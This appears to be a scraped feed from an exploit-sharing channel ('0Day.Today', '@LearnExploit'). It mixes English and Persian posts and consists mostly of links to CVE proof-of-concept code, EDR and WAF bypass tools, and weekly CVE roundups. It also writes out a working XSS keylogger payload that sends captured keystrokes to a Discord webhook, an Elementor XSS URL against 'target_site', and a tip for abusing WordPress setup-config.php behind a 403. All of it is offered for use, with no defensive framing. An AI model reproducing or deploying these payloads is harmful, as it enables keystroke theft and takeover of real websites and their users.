Super Xray ( Web Vulnerability Scanner )
Github
#scanner #Vulnerability
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#scanner #Vulnerability
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3🔥3👎1
0Day.Today | Learn Exploit | Zero World | Dark web |
In This Ceek بررسی CVEهای پر سر و صدای این هفته (5 تا 11 آذر 1401) https://vrgl.ir/ai8Vt #ITC #CVE —————— 0Day.Today @LearnExploit @Tech_Army
In This Ceek
بررسی CVEهای پر سر و صدای این هفته (19 تا 25 آذر 1401)
https://vrgl.ir/geTOU
#ITC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
بررسی CVEهای پر سر و صدای این هفته (19 تا 25 آذر 1401)
https://vrgl.ir/geTOU
#ITC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
testing 403 bypass ?
You found a /wp-admin with 403 status.
Bypass it using /wp-admin/setup-config.php?step=1
This will allow you to create a database.
From here, you can escalate it to any other big vulnerability
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
You found a /wp-admin with 403 status.
Bypass it using /wp-admin/setup-config.php?step=1
This will allow you to create a database.
From here, you can escalate it to any other big vulnerability
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥6⚡2👍1
Dirty Vanity ( a new injection technique that abuses the Windows fork API to bypass the EDR )
PDF
POC
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Get root on macOS 13.0.1 with CVE-2022-46689 (macOS equivalent of the Dirty Cow bug)
Github
#CVE #macOS
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #macOS
——————
0Day.Today
@LearnExploit
@Tech_Army
PS5 Kernel Exploit: ELF Loader added to BD-JB version
Link
#exploit #ps5
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#exploit #ps5
——————
0Day.Today
@LearnExploit
@Tech_Army
Wololo.net
PS5 Kernel Exploit: ELF Loader added to BD-JB version - Wololo.net
We’ve mentioned it yesterday, John Tornblom has been working on putting the Blu-Ray version of the PS5 exploit up to speed with the Webkit version. He’s now ported one of the most important features...
🔥2
Cloudmare ( Cloudflare, Sucuri, Incapsula real IP tracker )
Github
#bypass #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#bypass #tools
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
Hikvision log4j PoC ( Hikvision pre-auth log4j Poc )
Github
#POC #log4j
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#POC #log4j
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-2602 ( PoC Kernel Privilege Escalation Linux Published ( Exploit )
Read
Read
PoC
Exploit
#Exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
Read
Read
PoC
Exploit
#Exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
Php Remote file Inclusion and RCE in flatpressblog/flatpress
Read
#php
——————
0Day.Today
@LearnExploit
@Tech_Army
Read
#php
——————
0Day.Today
@LearnExploit
@Tech_Army
👍1
Linux Kernel RCE (ksmbd)
🆘 CVSS Score : 10 out of 10
Read
The patch arrived in the core only in the branch 5.15.61
#linux #kernel
——————
0Day.Today
@LearnExploit
@Tech_Army
🆘 CVSS Score : 10 out of 10
Read
The patch arrived in the core only in the branch 5.15.61
#linux #kernel
——————
0Day.Today
@LearnExploit
@Tech_Army
🤯2
XSS Payload - Discord Keylogger
usage:
——————
0Day.Today
@LearnExploit
@Tech_Army
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>
#discord #xss——————
0Day.Today
@LearnExploit
@Tech_Army
👍4
Wordpress - XSS ( CVE-2022-29455)
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
#wordpress #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==
#wordpress #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥10❤🔥1👍1
آموزش نصب جدیدترین نسخه Burpsuite بر روی ویندوز
+ اگر نمیدونین چه ورژنی از جاوا و این که چطوری ابزار رو بالا بیارید حتما این ویدیو رو ببینین تمام سوالاتون اینجا هست :)
#burpsuite #burp
iliya(h.r)
——————
0Day.Today
@LearnExploit
@Tech_Army
+ اگر نمیدونین چه ورژنی از جاوا و این که چطوری ابزار رو بالا بیارید حتما این ویدیو رو ببینین تمام سوالاتون اینجا هست :)
#burpsuite #burp
iliya(h.r)
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5👍2
0Day.Today | Learn Exploit | Zero World | Dark web |
In This Ceek بررسی CVEهای پر سر و صدای این هفته (19 تا 25 آذر 1401) https://vrgl.ir/geTOU #ITC #CVE —————— 0Day.Today @LearnExploit @Tech_Army
In This Ceek
بررسی CVEهای پر سر و صدای این هفته (26 آذر تا 2 دی 1401)
https://vrgl.ir/4yojP
#ITC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
بررسی CVEهای پر سر و صدای این هفته (26 آذر تا 2 دی 1401)
https://vrgl.ir/4yojP
#ITC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2022-42046 ( local privilege escalation )
POC
#windows #poc
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
#windows #poc
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - kkent030315/CVE-2022-42046: CVE-2022-42046 Proof of Concept of wfshbr64.sys local privilege escalation via DKOM
CVE-2022-42046 Proof of Concept of wfshbr64.sys local privilege escalation via DKOM - kkent030315/CVE-2022-42046